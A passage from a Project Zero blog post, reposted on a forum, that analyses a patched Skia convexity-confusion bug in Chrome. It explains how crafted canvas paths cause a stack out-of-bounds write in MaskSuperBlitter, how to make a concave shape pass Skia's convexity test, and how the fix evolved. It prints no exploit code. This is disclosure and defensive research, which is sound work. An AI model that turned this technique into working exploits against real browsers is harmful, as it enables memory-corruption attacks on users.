aren’t relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, edges 2 and 4 are both replaced with edges 5 and 6. The purpose of edges 5 and 6 is once again to reset the local_top variable - it will be set to the height shown as the red dotted line in the image. Now, edge 5 and 6 will both get replaced with edges 7 and 8 - and here is the issue: Edges 7 and 8 are not going to be drawn for y coordinates between the green and blue line, as they are supposed to. Instead, they are going to be rendered all the way from the red line to the blue line. Note the very low steepness of edges 7 and 8 - for every line, the x coordinates to draw to are going to be significantly increased and, given that they are going to be drawn in a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds. This causes a stack out-of-bounds write if a path is drawn using SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is going to be filled with 8-bit opacity for each pixel of the path region. Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren’t any bounds checks on the opacity buffer (there are only debug asserts here and here), which leads to an out-of bounds write on the stack. Specifically (due to how opacity buffer works) we can increment values on the stack past the end of the buffer by a small amount. This variant is again triggerable in Chrome by simply drawing a path to the Canvas and gives us a pretty nice primitive for exploitation - note that this is not a linear overflow and offsets involved can be controlled by the slope of edges 7 and 8. The PoC can be seen here - most of it is just setting up the path coordinates so that the path is initially declared convex and at the same time small enough so that MaskSuperBlitter can render it. How to make the shape needed to trigger the bug appear convex to Skia but also fit in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone because there are tiny shifts in y direction along the line - but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can’t make monotone are vertical edges (edges 5 and 6), but if you squashed the shape sufficiently they become so short that their square length does not fit in a float and are ignored by the Skia convexity test. This is illustrated in Image 10. In reality these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it to the shape depicted in Image 9. (a) (b) (c) Image 10: Making the shape from Image 9 appear convex, (a) original shape, (b) shape after y-scale, (c) shape after y-scale rotation On fixing the issue Initially, Skia developers attempted to fix the issue by not propagating convexity information after the transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient because very small concavities (where square distance between points is too small to fit in a 32-bit float) could still be enlarged using only scale transformation and could form shapes that would trigger memory corruption issues. After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in a way that passing concave shapes to it won’t result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72. It isn’t uncommon that an initial fix for a vulnerability is insufficient. But the saving grace for Skia, Chrome and most open source projects is that the bug reporter can see the fix immediately when it’s created and point out the potential drawbacks. Unfortunately, this isn’t the case for many closed-source projects or even open-sourced projects where the bug fixing process is opaque to the reporter, which caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on the fixes early and comment on them before they are released to the public. Conclusion There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously. I have some experience with it and, while I can’t say I’m an expert I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I was writing a graphics library, I would convert floats to fixed-point precision as soon as possible and wouldn’t trust anything computed based on floating-point arithmetic at all. Secondly, the issue highlights the importance of doing variant analysis - I discovered it based on a public bug report and other people could have done the same. Thirdly, it highlights the importance of defense-in-depth. The latest patch makes sure that drawing a concave path with convex path algorithms won’t result in memory corruption, which also addresses unknown variants of convexity issues. If this was implemented immediately after the initial report, Project Zero would now have one blog post less Posted by Ben at 10:08 AM Sursa: https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html
      • 1
      • Upvote
×
×
  • Create New...